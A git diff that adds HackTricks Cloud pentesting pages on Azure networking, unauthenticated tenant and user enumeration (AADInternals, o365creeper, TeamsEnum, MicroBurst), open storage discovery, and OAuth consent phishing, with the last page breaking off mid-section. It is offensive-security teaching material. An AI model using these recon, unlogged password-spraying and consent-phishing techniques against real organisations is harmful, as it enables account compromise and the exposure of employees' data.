+## Azure Private Link
+
+Azure Private Link is a service in Azure that **enables private access to Azure services** by ensuring that **traffic between your Azure virtual network (VNet) and the service travels entirely within Microsoft's Azure backbone network**. It effectively brings the service into your VNet. This setup enhances security by not exposing the data to the public internet.
+
+Private Link can be used with various Azure services, like Azure Storage, Azure SQL Database, and custom services shared via Private Link. It provides a secure way to consume services from within your own VNet or even from different Azure subscriptions.
+
+{% hint style="danger" %}
+NSGs do not apply to private endpoints, which clearly means that associating an NSG with a subnet that contains the Private Link will have no effect.
+{% endhint %}
+
+**Example:**
+
+Consider a scenario where you have an **Azure SQL Database that you want to access securely from your VNet**. Normally, this might involve traversing the public internet. With Private Link, you can create a **private endpoint in your VNet** that connects directly to the Azure SQL Database service. This endpoint makes the database appear as though it's part of your own VNet, accessible via a private IP address, thus ensuring secure and private access.
+
+### **Enumeration**
+
+{% code overflow="wrap" %}
+```bash
+# List Private Link Services
+az network private-link-service list --query "[].{name:name, location:location, resourceGroup:resourceGroup}" -o table
+
+# List Private Endpoints
+az network private-endpoint list --query "[].{name:name, location:location, resourceGroup:resourceGroup, privateLinkServiceConnections:privateLinkServiceConnections}" -o table
+```
+{% endcode %}
+
+## Azure Service Endpoints
+
+Azure Service Endpoints extend your virtual network private address space and the identity of your VNet to Azure services over a direct connection. By enabling service endpoints, **resources in your VNet can securely connect to Azure services**, like Azure Storage and Azure SQL Database, using Azure's backbone network. This ensures that the **traffic from the VNet to the Azure service stays within the Azure network**, providing a more secure and reliable path.
+
+**Example:**
+
+For instance, an **Azure Storage** account by default is accessible over the public internet. By enabling a **service endpoint for Azure Storage within your VNet**, you can ensure that only traffic from your VNet can access the storage account. The storage account firewall can then be configured to accept traffic only from your VNet.
+
+### **Enumeration**
+
+{% code overflow="wrap" %}
+```bash
+# List Virtual Networks with Service Endpoints
+az network vnet list --query "[].{name:name, location:location, serviceEndpoints:serviceEndpoints}" -o table
+
+# List Subnets with Service Endpoints
+az network vnet subnet list --resource-group <ResourceGroupName> --vnet-name <VNetName> --query "[].{name:name, serviceEndpoints:serviceEndpoints}" -o table
+```
+{% endcode %}
+
+### Differences Between Service Endpoints and Private Links
+
+Microsoft recommends using Private Links in the [**docs**](https://learn.microsoft.com/en-us/azure/virtual-network/vnet-integration-for-azure-services#compare-private-endpoints-and-service-endpoints):
+
+<figure><img src="../../../../.gitbook/assets/image (25).png" alt=""><figcaption></figcaption></figure>
+
+**Service Endpoints:**
+
+* Traffic from your VNet to the Azure service travels over the Microsoft Azure backbone network, bypassing the public internet.
+* The endpoint is a direct connection to the Azure service and does not provide a private IP for the service within the VNet.
+* The service itself is still accessible via its public endpoint from outside your VNet unless you configure the service firewall to block such traffic.
+* It's a one-to-one relationship between the subnet and the Azure service.
+* Less expensive than Private Links.
+
+**Private Links:**
+
+* Private Link maps Azure services into your VNet via a private endpoint, which is a network interface with a private IP address within your VNet.
+* The Azure service is accessed using this private IP address, making it appear as if it's part of your network.
+* Services connected via Private Link can be accessed only from your VNet or connected networks; there's no public internet access to the service.
+* It enables a secure connection to Azure services or your own services hosted in Azure, as well as a connection to services shared by others.
+* It provides more granular access control via a private endpoint in your VNet, as opposed to broader access control at the subnet level with service endpoints.
+
+In summary, while both Service Endpoints and Private Links provide secure connectivity to Azure services, **Private Links offer a higher level of isolation and security by ensuring that services are accessed privately without exposing them to the public internet**. Service Endpoints, on the other hand, are easier to set up for general cases where simple, secure access to Azure services is required without the need for a private IP in the VNet.
+
+## Azure Front Door (AFD) & AFD WAF
+
+**Azure Front Door** is a scalable and secure entry point for **fast delivery** of your global web applications. It **combines** various services like global **load balancing, site acceleration, SSL offloading, and Web Application Firewall (WAF)** capabilities into a single service. Azure Front Door provides intelligent routing based on the **closest edge location to the user**, ensuring optimal performance and reliability. Additionally, it offers URL-based routing, multiple-site hosting, session affinity, and application layer security.
+
+**Azure Front Door WAF** is designed to **protect web applications from web-based attacks** without modification to back-end code. It includes custom rules and managed rule sets to protect against threats such as SQL injection, cross-site scripting, and other common attacks.
+
+**Example:**
+
+Imagine you have a globally distributed application with users all around the world. You can use Azure Front Door to **route user requests to the nearest regional data center** hosting your application, thus reducing latency, improving user experience and **defending it from web attacks with the WAF capabilities**. If a particular region experiences downtime, Azure Front Door can automatically reroute traffic to the next best location, ensuring high availability.
+
+### Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# List Azure Front Door Instances
+az network front-door list --query "[].{name:name, resourceGroup:resourceGroup, location:location}" -o table
+
+# List Front Door WAF Policies
+az network front-door waf-policy list --query "[].{name:name, resourceGroup:resourceGroup, location:location}" -o table
+```
+{% endcode %}
+
+## Azure Application Gateway and Azure Application Gateway WAF
+
+Azure Application Gateway is a **web traffic load balancer** that enables you to manage traffic to your **web** applications. It offers **Layer 7 load balancing, SSL termination, and web application firewall (WAF) capabilities** in the Application Delivery Controller (ADC) as a service. Key features include URL-based routing, cookie-based session affinity, and secure sockets layer (SSL) offloading, which are crucial for applications that require complex load-balancing capabilities like global routing and path-based routing.
+
+**Example:**
+
+Consider a scenario where you have an e-commerce website that includes multiple subdomains for different functions, such as user accounts and payment processing. Azure Application Gateway can **route traffic to the appropriate web servers based on the URL path**. For example, traffic to `example.com/accounts` could be directed to the user accounts service, and traffic to `example.com/pay` could be directed to the payment processing service.\
+And **protect your website from attacks using the WAF capabilities.**
+
+### **Enumeration**
+
+{% code overflow="wrap" %}
+```bash
+# List the Web Application Firewall configurations for your Application Gateways
+az network application-gateway waf-config list --gateway-name <AppGatewayName> --resource-group <ResourceGroupName> --query "[].{name:name, firewallMode:firewallMode, ruleSetType:ruleSetType, ruleSetVersion:ruleSetVersion}" -o table
+```
+{% endcode %}
+
+## Azure Hub, Spoke & VNet Peering
+
+**VNet Peering** is a networking feature in Azure that **allows different Virtual Networks (VNets) to be connected directly and seamlessly**. Through VNet peering, resources in one VNet can communicate with resources in another VNet using private IP addresses, **as if they were in the same network**.\
+**VNet Peering can also used with a on-prem networks** by setting up a site-to-site VPN or Azure ExpressRoute.
+
+**Azure Hub and Spoke** is a network topology used in Azure to manage and organize network traffic. **The "hub" is a central point that controls and routes traffic between different "spokes"**. The hub typically contains shared services such as network virtual appliances (NVAs), Azure VPN Gateway, Azure Firewall, or Azure Bastion. The **"spokes" are VNets that host workloads and connect to the hub using VNet peering**, allowing them to leverage the shared services within the hub. This model promotes clean network layout, reducing complexity by centralizing common services that multiple workloads across different VNets can use.
+
+{% hint style="danger" %}
+**VNET pairing is non-transitive in Azure**, which means that if spoke 1 is connected to spoke 2 and spoke 2 is connected to spoke 3 then spoke 1 cannot talk directly to spoke 3.
+{% endhint %}
+
+**Example:**
+
+Imagine a company with separate departments like Sales, HR, and Development, **each with its own VNet (the spokes)**. These VNets **require access to shared resources** like a central database, a firewall, and an internet gateway, which are all located in **another VNet (the hub)**. By using the Hub and Spoke model, each department can **securely connect to the shared resources through the hub VNet without exposing those resources to the public internet** or creating a complex network structure with numerous connections.
+
+### Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# List all VNets in your subscription
+az network vnet list --query "[].{name:name, location:location, addressSpace:addressSpace}" -o table
+
+# List VNet peering connections for a given VNet
+az network vnet peering list --resource-group <ResourceGroupName> --vnet-name <VNetName> --query "[].{name:name, peeringState:peeringState, remoteVnetId:remoteVnetId}" -o table
+
+# List Shared Resources (e.g., Azure Firewall) in the Hub
+az network firewall list --query "[].{name:name, location:location, resourceGroup:resourceGroup}" -o table
+```
+{% endcode %}
+
+## Site-to-Site VPN
+
+A Site-to-Site VPN in Azure allows you to **connect your on-premises network to your Azure Virtual Network (VNet)**, enabling resources such as VMs within Azure to appear as if they are on your local network. This connection is established through a **VPN gateway that encrypts traffic** between the two networks.
+
+**Example:**
+
+A business with its main office located in New York has an on-premises data center that needs to connect securely to its VNet in Azure, which hosts its virtualized workloads. By setting up a **Site-to-Site VPN, the company can ensure encrypted connectivity between the on-premises servers and the Azure VMs**, allowing for resources to be accessed securely across both environments as if they were in the same local network.
+
+### **Enumeration**
+
+{% code overflow="wrap" %}
+```bash
+# List VPN Gateways
+az network vnet-gateway list --query "[].{name:name, location:location, resourceGroup:resourceGroup}" -o table
+
+# List VPN Connections
+az network vpn-connection list --gateway-name <VpnGatewayName> --resource-group <ResourceGroupName> --query "[].{name:name, connectionType:connectionType, connectionStatus:connectionStatus}" -o table
+```
+{% endcode %}
+
+## Azure ExpressRoute
+
+Azure ExpressRoute is a service that provides a **private, dedicated, high-speed connection between your on-premises infrastructure and Azure data centers**. This connection is made through a connectivity provider, bypassing the public internet and offering more reliability, faster speeds, lower latencies, and higher security than typical internet connections.
+
+**Example:**
+
+A multinational corporation requires a **consistent and reliable connection to its Azure services due to the high volume of data** and the need for high throughput. The company opts for Azure ExpressRoute to directly connect its on-premises data center to Azure, facilitating large-scale data transfers, such as daily backups and real-time data analytics, with enhanced privacy and speed.
+
+### **Enumeration**
+
+{% code overflow="wrap" %}
+```bash
+# List ExpressRoute Circuits
+az network express-route list --query "[].{name:name, location:location, resourceGroup:resourceGroup, serviceProviderName:serviceProviderName, peeringLocation:peeringLocation}" -o table
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md
new file mode 100644
index 0000000000..6fd2ea79d6
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md
@@ -0,0 +1,277 @@
+# Az - Unauthenticated Enum & Initial Entry
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Azure Tenant
+
+### Tenant Enumeration
+
+There are some **public Azure APIs** that just knowing the **domain of the tenant** an attacker could query to gather more info about it.\
+You can query directly the API or use the PowerShell library [**AADInternals**](https://github.com/Gerenios/AADInternals)**:**
+
+| API                                                                  | Information                                                                                                                                                                                                                                           | AADInternals function                             |
+| -------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------- |
+| login.microsoftonline.com/\<domain>/.well-known/openid-configuration | **Login information**, including tenant ID                                                                                                                                                                                                            | `Get-AADIntTenantID -Domain <domain>`             |
+| autodiscover-s.outlook.com/autodiscover/autodiscover.svc             | **All domains** of the tenant                                                                                                                                                                                                                         | `Get-AADIntTenantDomains -Domain <domain>`        |
+| login.microsoftonline.com/GetUserRealm.srf?login=\<UserName>         | <p><strong>Login information</strong> of the tenant, including tenant Name and domain <strong>authentication type.</strong><br>If <code>NameSpaceType</code> is <strong><code>Managed</code></strong>, it means <strong>AzureAD</strong> is used.</p> | `Get-AADIntLoginInformation -UserName <UserName>` |
+| login.microsoftonline.com/common/GetCredentialType                   | Login information, including **Desktop SSO information**                                                                                                                                                                                              | `Get-AADIntLoginInformation -UserName <UserName>` |
+
+You can query all the information of an Azure tenant with **just one command of the** [**AADInternals**](https://github.com/Gerenios/AADInternals) **library**:
+
+```powershell
+Invoke-AADIntReconAsOutsider -DomainName corp.onmicrosoft.com | Format-Table
+```
+
+Output Example of the Azure tenant info:
+
+```
+Tenant brand:       Company Ltd
+Tenant name:        company
+Tenant id:          1937e3ab-38de-a735-a830-3075ea7e5b39
+DesktopSSO enabled: True
+
+Name                           DNS   MX    SPF  Type      STS
+----                           ---   --    ---  ----      ---
+company.com                   True  True  True  Federated sts.company.com
+company.mail.onmicrosoft.com  True  True  True  Managed
+company.onmicrosoft.com       True  True  True  Managed
+int.company.com              False False False  Managed
+```
+
+It's possible to observe details about the tenant's name, ID, and "brand" name. Additionally, the status of the Desktop Single Sign-On (SSO), also known as [**Seamless SSO**](https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso), is displayed. When enabled, this feature facilitates the determination of the presence (enumeration) of a specific user within the target organization.
+
+Moreover, the output presents the names of all verified domains associated with the target tenant, along with their respective identity types. In the case of federated domains, the Fully Qualified Domain Name (FQDN) of the identity provider in use, typically an ADFS server, is also disclosed. The "MX" column specifies whether emails are routed to Exchange Online, while the "SPF" column denotes the listing of Exchange Online as an email sender. It is important to note that the current reconnaissance function does not parse the "include" statements within SPF records, which may result in false negatives.
+
+### User Enumeration
+
+It's possible to **check if a username exists** inside a tenant. This includes also **guest users**, whose username is in the format:
+
+```
+<email>#EXT#@<tenant name>.onmicrosoft.com
+```
+
+The email is user’s email address where at “@” is replaced with underscore “\_“.
+
+With [**AADInternals**](https://github.com/Gerenios/AADInternals), you can easily check if the user exists or not:
+
+```powershell
+# Check does the user exist
+Invoke-AADIntUserEnumerationAsOutsider -UserName "user@company.com"
+```
+
+Output:
+
+```
+UserName         Exists
+--------         ------
+user@company.com True
+```
+
+You can also use a text file containing one email address per row:
+
+```
+user@company.com
+user2@company.com
+admin@company.com
+admin2@company.com
+external.user_gmail.com#EXT#@company.onmicrosoft.com
+external.user_outlook.com#EXT#@company.onmicrosoft.com
+```
+
+```powershell
+# Invoke user enumeration
+Get-Content .\users.txt | Invoke-AADIntUserEnumerationAsOutsider -Method Normal
+```
+
+There are **three different enumeration methods** to choose from:
+
+| Method    | Description                                                                                                                                                                                             |
+| --------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| Normal    | This refers to the GetCredentialType API mentioned above. The default method.                                                                                                                           |
+| Login     | <p>This method tries to log in as the user.<br><strong>Note:</strong> queries will be logged to sign-ins log.</p>                                                                                       |
+| Autologon | <p>This method tries to log in as the user via autologon endpoint.<br><strong>Queries are not logged</strong> to sign-ins log! As such, works well also for password spray and brute-force attacks.</p> |
+
+After discovering the valid usernames you can get **info about a user** with:
+
+```powershell
+Get-AADIntLoginInformation -UserName root@corp.onmicrosoft.com
+```
+
+The script [**o365creeper**](https://github.com/LMGsec/o365creeper) also allows you to discover **if an email is valid**.
+
+```powershell
+# Put in emails.txt emails such as:
+# - root@corp.onmicrosoft.com
+python.exe .\o365creeper\o365creeper.py -f .\emails.txt -o validemails.txt
+```
+
+**User Enumeration via Microsoft Teams**
+
+Another good source of information is Microsoft Teams.
+
+The API of Microsoft Teams allows to search for users. In particular the "user search" endpoints **externalsearchv3** and **searchUsers** could be used to request general information about Teams-enrolled user accounts.
+
+Depending on the API response it is possible to distinguish between non-existing users and existing users that have a valid Teams subscription.
+
+The script [**TeamsEnum**](https://github.com/sse-secure-systems/TeamsEnum) could be used to validate a given set of usernames against the Teams API.
+
+```bash
+python3 TeamsEnum.py -a password -u <username> -f inputlist.txt -o teamsenum-output.json
+```
+
+Output:
+
+```
+[-] user1@domain - Target user not found. Either the user does not exist, is not Teams-enrolled or is configured to not appear in search results (personal accounts only)
+[+] user2@domain - User2 | Company (Away, Mobile)
+[+] user3@domain - User3 | Company (Available, Desktop)
+```
+
+Furthermore it is possible to enumerate availability information about existing users like the following:
+
+* Available
+* Away
+* DoNotDisturb
+* Busy
+* Offline
+
+If an **out-of-office message** is configured, it's also possible to retrieve the message using TeamsEnum. If an output file was specified, the out-of-office messages are automatically stored within the JSON file:
+
+```
+jq . teamsenum-output.json
+```
+
+Output:
+
+```json
+{
+  "email": "user2@domain",
+  "exists": true,
+  "info": [
+    {
+      "tenantId": "[REDACTED]",
+      "isShortProfile": false,
+      "accountEnabled": true,
+      "featureSettings": {
+        "coExistenceMode": "TeamsOnly"
+      },
+      "userPrincipalName": "user2@domain",
+      "givenName": "user2@domain",
+      "surname": "",
+      "email": "user2@domain",
+      "tenantName": "Company",
+      "displayName": "User2",
+      "type": "Federated",
+      "mri": "8:orgid:[REDACTED]",
+      "objectId": "[REDACTED]"
+    }
+  ],
+  "presence": [
+    {
+      "mri": "8:orgid:[REDACTED]",
+      "presence": {
+        "sourceNetwork": "Federated",
+        "calendarData": {
+          "outOfOfficeNote": {
+            "message": "Dear sender. I am out of the office until March 23rd with limited access to my email. I will respond after my return.Kind regards, User2",
+            "publishTime": "2023-03-15T21:44:42.0649385Z",
+            "expiry": "2023-04-05T14:00:00Z"
+          },
+          "isOutOfOffice": true
+        },
+        "capabilities": [
+          "Audio",
+          "Video"
+        ],
+        "availability": "Away",
+        "activity": "Away",
+        "deviceType": "Mobile"
+      },
+      "etagMatch": false,
+      "etag": "[REDACTED]",
+      "status": 20000
+    }
+  ]
+}
+```
+
+## Azure Services
+
+Know that we know the **domains the Azure tenant** is using is time to try to find **Azure services exposed**.
+
+You can use a method from [**MicroBust**](https://github.com/NetSPI/MicroBurst) for such goal. This function will search the base domain name (and a few permutations) in several **azure service domains:**
+
+```powershell
+Import-Module .\MicroBurst\MicroBurst.psm1 -Verbose
+Invoke-EnumerateAzureSubDomains -Base corp -Verbose
+```
+
+## Open Storage
+
+You could discover open storage with a tool such as [**InvokeEnumerateAzureBlobs.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/Misc/Invoke-EnumerateAzureBlobs.ps1) which will use the file **`Microburst/Misc/permitations.txt`** to generate permutations (very simple) to try to **find open storage accounts**.
+
+```powershell
+Import-Module .\MicroBurst\MicroBurst.psm1
+Invoke-EnumerateAzureBlobs -Base corp
+[...]
+https://corpcommon.blob.core.windows.net/secrets?restype=container&comp=list
+[...]
+
+# Access https://corpcommon.blob.core.windows.net/secrets?restype=container&comp=list
+# Check: <Name>ssh_info.json</Name>
+# Access then https://corpcommon.blob.core.windows.net/secrets/ssh_info.json
+```
+
+### SAS URLs
+
+A _**shared access signature**_ (SAS) URL is an URL that **provides access** to certain part of a Storage account (could be a full container, a file...) with some specific permissions (read, write...) over the resources. If you find one leaked you could be able to access sensitive information, they look like this (this is to access a container, if it was just granting access to a file the path of the URL will also contain that file):
+
+`https://<storage_account_name>.blob.core.windows.net/newcontainer?sp=r&st=2021-09-26T18:15:21Z&se=2021-10-27T02:14:21Z&spr=https&sv=2021-07-08&sr=c&sig=7S%2BZySOgy4aA3Dk0V1cJyTSIf1cW%2Fu3WFkhHV32%2B4PE%3D`
+
+Use [**Storage Explorer**](https://azure.microsoft.com/en-us/features/storage-explorer/) to access the data
+
+## Compromise Credentials
+
+### Phishing
+
+* [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or OAuth App -[Illicit Consent Grant Attack](az-oauth-apps-phishing.md)-)
+* [**Device Code Authentication** Phishing](az-device-code-authentication-phishing.md)
+
+### Password Spraying / Brute-Force
+
+{% content-ref url="az-password-spraying.md" %}
+[az-password-spraying.md](az-password-spraying.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://aadinternals.com/post/just-looking/](https://aadinternals.com/post/just-looking/)
+* [https://www.securesystems.de/blog/a-fresh-look-at-user-enumeration-in-microsoft-teams/](https://www.securesystems.de/blog/a-fresh-look-at-user-enumeration-in-microsoft-teams/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md
new file mode 100644
index 0000000000..b48b2dceac
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md
@@ -0,0 +1,33 @@
+# Az - Device Code Authentication Phishing
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+**Check:** [**https://o365blog.com/post/phishing/**](https://o365blog.com/post/phishing/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md
new file mode 100644
index 0000000000..540e9a615f
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md
@@ -0,0 +1,185 @@
+# Az - OAuth Apps Phishing
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## OAuth App Phishing
+
+**Azure Applications** are configured with the permissions they will be able to use when a user consents the application (like enumerating the directory, access files, or perform other actions). Note, that the application will be having on behalf of the user, so even if the app could be asking for administration permissions, if the **user consenting it doesn't have that permission**, the app **won't be able to perform administrative actions**.
+
+### App consent permissions
+
+By default any **user can give consent to apps**, although this can be configured so users can only consent to **apps from verified publishers for selected permissions** or to even **remove the permission** for users to consent to applications.
+
+<figure><img src="../../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
+
+If users cannot consent, **admins** like `GA`, `Application Administrator` or `Cloud Application` `Administrator` can **consent the applications** that users will be able to use.
+
+Moreover, if users can consent only to apps using **low risk** permissions, these permissions are by default **openid**, **profile**, **email**, **User.Read** and **offline\_access**, although it's possible to **add more** to this list.
+
+nd if they can consent to all apps, they can consent to all apps.
+
+### 2 Types of attacks
+
+* **Unauthenticated**: From an external account create an application with the **low risk permissions** `User.Read` and `User.ReadBasic.All` for example, phish a user, and you will be able to access directory information.
+  * This requires the phished user to be **able to accept OAuth apps from external tenant**
+  * If the phised user is an some admin that can **consent any app with any permissions**, the application could also **request privileged permissions**
+* **Authenticated**: Having compromised a principal with enough privileges, **create an application inside the account** and **phish** some **privileged** user which can accept privileged OAuth permissions.
+  * In this case you can already access the info of the directory, so the permission `User.ReadBasic.All` isn't no longer interesting.
+  * You are probable interested in **permissions that require and admin to grant them**, because raw user cannot give OAuth apps any permission, thats why you need to **phish only those users** (more on which roles/permissions grant this privilege later)
+
+### Users are allowed to consent
+
+Note that you need to execute this command from a user inside the tenant, you cannot find this configuration of a tenant from an external one. The following cli can help you understand the users permissions:
+
+{% code overflow="wrap" %}
+```bash
+az rest --method GET --url "https://graph.microsoft.com/v1.0/policies/authorizationPolicy"
+```
+{% endcode %}
+
+* Users can consent to all apps: If inside **`permissionGrantPoliciesAssigned`** you can find: `ManagePermissionGrantsForSelf.microsoft-user-default-legacy` then users can to accept every application.
+* Users can consent to apps from verified publishers or your organization, but only for permissions you select: If inside **`permissionGrantPoliciesAssigned`** you can find: `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-team` then users can to accept every application.
+* **Disable user consent**: If inside **`permissionGrantPoliciesAssigned`** you can only find: `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-chat` and `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-team` then users cannot consent any.
+
+It's possible to find the meaning of each of the commented policies in:
+
+{% code overflow="wrap" %}
+```bash
+az rest --method GET --url "https://graph.microsoft.com/v1.0/policies/permissionGrantPolicies"
+```
+{% endcode %}
+
+### **Application Admins**
+
+Check users that are considered application admins (can accept new applications):
+
+{% code overflow="wrap" %}
+```bash
+# Get list of roles
+az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles"
+
+# Get Global Administrators
+az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/1b2256f9-46c1-4fc2-a125-5b2f51bb43b7/members"
+
+# Get Application Administrators
+az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/1e92c3b7-2363-4826-93a6-7f7a5b53e7f9/members"
+
+# Get Cloud Applications Administrators
+az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/0d601d27-7b9c-476f-8134-8e7cd6744f02/members"
+```
+{% endcode %}
+
+## **Attack Flow Overview**
+
+The attack involves several steps targeting a generic company. Here's how it might unfold:
+
